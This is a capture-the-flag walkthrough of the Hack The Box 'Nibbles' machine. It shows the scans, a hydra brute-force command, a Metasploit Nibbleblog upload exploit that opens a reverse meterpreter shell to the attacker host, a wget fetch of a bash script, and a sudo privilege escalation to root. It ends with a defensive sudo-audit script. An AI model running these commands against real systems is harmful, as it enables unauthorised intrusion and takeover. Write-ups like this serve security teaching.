HTB Nibbles

$nmap -A -sV -T4 -p- 10.10.10.75

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 10:38 CEST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (6).
Stats: 0:02:58 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 79.31% done; ETC: 10:42 (0:00:46 remaining)
Stats: 0:04:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 92.09% done; ETC: 10:43 (0:00:24 remaining)
Nmap scan report for 10.10.10.75
Host is up (0.044s latency).
Not shown: 65407 closed ports, 126 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 348.08 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Access to http://10.10.10.75/

Do we have a /nibbleblog directory?

Access to http://10.10.10.75/nibbleblog/

$nikto -h http://10.10.10.75/nibbleblog/

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.75
+ Target Hostname:    10.10.10.75
+ Target Port:        80
+ Start Time:         2020-07-15 10:58:50 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...
+ OSVDB-3092: /nibbleblog/README: README file found.
+ OSVDB-3092: /nibbleblog/install.php: install.php file found.
+ OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.
+ 7866 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-07-15 11:06:24 (GMT2) (454 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Results:

  • OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  • OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
  • OSVDB-3092: /nibbleblog/admin/: This might be interesting…
  • OSVDB-3092: /nibbleblog/admin.php: This might be interesting…
  • OSVDB-3092: /nibbleblog/README: README file found.
  • OSVDB-3092: /nibbleblog/install.php: install.php file found.
  • OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.

As the box name and the scan results suggest, the target is running Nibbleblog.

Let's try to obtain the admin user's password.

Referer: http://10.10.10.75/nibbleblog/admin.php
Request body: username=admin&password=admin

hydra -l admin -P /home/ruben/ctf-tools/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^&Login=Login:Incorrect username or password."

Access http://10.10.10.75/nibbleblog/admin.php using admin/nicole.

There is a blacklist control implemented.

Using default credentials (admin/nibbles) we can access.

Blog version:

$searchsploit nibble -v

[i] Unable to detect version in terms: nibble
[i] Enabling 'searchsploit --strict'
----------------------------------------------------------------- ---------------------------------
Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                           | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)            | php/remote/38489.rb
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

There is a Metasploit module for it, so let's run it.

msf5 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

msf5 >

msf5 > use 0

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

msf5 exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3

msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.14

PASSWORD => nibbles
rhost => 10.10.10.75
username => admin
lhost => 10.10.14.14

msf5 exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nibbles          yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.75      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.14      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3

msf5 exploit(multi/http/nibbleblog_file_upload) >

msf5 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[-] Exploit aborted due to failure: no-access: Unable to login. Verify USERNAME/PASSWORD or TARGETURI.
[*] Exploit completed, but no session was created.

We also need to set TARGETURI to the blog's base path.

msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.75:45282) at 2020-07-16 16:49:39 +0200
[+] Deleted image.php

meterpreter >

meterpreter > getuid

Server username: nibbler (1001)

meterpreter > dir

Listing: /var/www/html/nibbleblog/content/private/plugins/my_image
==================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  258   fil   2020-07-16 16:49:39 +0200  db.xml

meterpreter > cd /home
meterpreter > dir

Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2017-12-29 11:54:16 +0100  nibbler

meterpreter > cd nibbler
meterpreter > ls

Listing: /home/nibbler
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2017-12-29 11:29:56 +0100  .bash_history
40775/rwxrwxr-x   4096  dir   2017-12-11 04:04:04 +0100  .nano
100400/r--------  1855  fil   2017-12-11 04:07:21 +0100  personal.zip
100400/r--------  33    fil   2017-12-11 04:35:21 +0100  user.txt

meterpreter > cat user.txt

b02fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Get a fully interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

nibbler@Nibbles:/home/nibbler$

With no command specified, sudo -l lists the commands the invoking user is allowed (and forbidden) to run.

nibbler@Nibbles:/home/nibbler$ sudo -l

sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Monitor.sh?

Let’s create our own monitor.sh that spawns a bash shell.

$cat monitor.sh

bash -i

$python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.75 - - [16/Jul/2020 17:19:22] "GET /monitor.sh HTTP/1.1" 200 -

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget 10.10.14.14:8080/monitor.sh                         
--2020-07-16 11:19:22--  http://10.10.14.14:8080/monitor.sh
Connecting to 10.10.14.14:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8 [text/x-sh]
Saving to: 'monitor.sh'

monitor.sh          100%[===================>]       8  --.-KB/s    in 0s      

2020-07-16 11:19:22 (1.36 MB/s) - 'monitor.sh' saved [8/8]

nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la

total 12
drwxr-xr-x 2 nibbler nibbler 4096 Jul 16 11:19 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rw-r--r-- 1 nibbler nibbler    8 Jul 16 11:17 monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh

sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection
root@Nibbles:/home/nibbler/personal/stuff#

root@Nibbles:/home/nibbler/personal/stuff# cd /root/
root@Nibbles:~# cat root.txt

b6d7XXXXXXXXXXXXXXXXXXXXXXXXXXXX
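The root cause above is a NOPASSWD sudo entry pointing at a script that lives under the user's own home directory, so the user can replace it. The following audit helper is an added example for this writeup (not part of the original post): it reads `sudo -l` output and flags any NOPASSWD command whose path, or any directory above it, the invoking user owns or that is world-writable. The user id, the path walk boundary TOP, and the sample sudoers line are assumptions for the demonstration.

```shell
#!/bin/sh
# Added audit helper for this writeup, not part of the original post: flags
# "sudo -l" NOPASSWD commands the invoking user could replace. POSIX sh + find.

# sudo_target_writable USER PATH [TOP]
# Walks from PATH up to TOP (default "/", written without a trailing slash) and
# prints each component that USER owns or that is world-writable without the
# sticky bit; either lets USER swap what root will execute, which is exactly
# the monitor.sh case. Returns 0 if anything was flagged, 1 if clean.
sudo_target_writable() {
  user=$1 path=$2 top=${3:-/} rc=1
  while :; do
    if [ -e "$path" ]; then
      if [ -n "$(find "$path" -prune -user "$user" 2>/dev/null)" ]; then
        echo "OWNED-BY-$user: $path"; rc=0
      elif [ -n "$(find "$path" -prune -perm -002 ! -perm -1000 2>/dev/null)" ]; then
        echo "WORLD-WRITABLE: $path"; rc=0
      fi
    fi
    [ "$path" = "$top" ] || [ "$path" = "/" ] && break
    path=$(dirname "$path")
  done
  return $rc
}

# audit_sudo_l USER [TOP]  < output-of-sudo-l
# Parses lines such as "    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
# and audits the executable of each NOPASSWD entry. Returns 1 if any finding.
audit_sudo_l() {
  user=$1 top=${2:-/} findings=0
  while IFS= read -r line; do
    case $line in
      *NOPASSWD:*)
        cmd=${line#*NOPASSWD: }   # strip the "(root) NOPASSWD: " prefix
        cmd=${cmd%%,*}            # first command of a comma-separated list
        cmd=${cmd%% *}            # drop arguments, keep the executable path
        if sudo_target_writable "$user" "$cmd" "$top"; then
          findings=$((findings + 1))
        fi
        ;;
    esac
  done
  echo "findings: $findings"
  [ "$findings" -eq 0 ]
}

# On a live host (the situation in this writeup):  sudo -l | audit_sudo_l "$(id -u)"
```

A clean result means every NOPASSWD target sits in a root-owned, non-world-writable path; the fix for the entry above is to move monitor.sh under a root-owned directory such as /usr/local/sbin with mode 755.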
